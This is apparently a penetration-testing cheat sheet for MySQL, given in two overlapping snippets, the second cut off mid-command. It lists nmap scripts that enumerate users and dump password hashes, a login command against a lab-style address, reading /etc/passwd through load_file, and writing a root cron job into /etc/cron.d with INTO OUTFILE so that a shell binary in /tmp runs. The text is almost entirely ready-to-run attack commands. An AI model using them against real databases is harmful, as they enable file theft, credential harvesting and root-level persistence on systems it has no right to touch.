-
Enumeration Mandatory Try to connect to the DB. Enumerate with nmap:nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target Optional If you have access to the DB: Try to read local files:SELECT load_file('/etc/passwd'); Try to write files:CREATE TABLE bbb(content TEXT);INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';
-
Connect: mysql --host=10.10.10.13 -P4444 -u admin admin Various commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the current process id: SELECT load_file('/etc/passwd'); Write as the daemon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…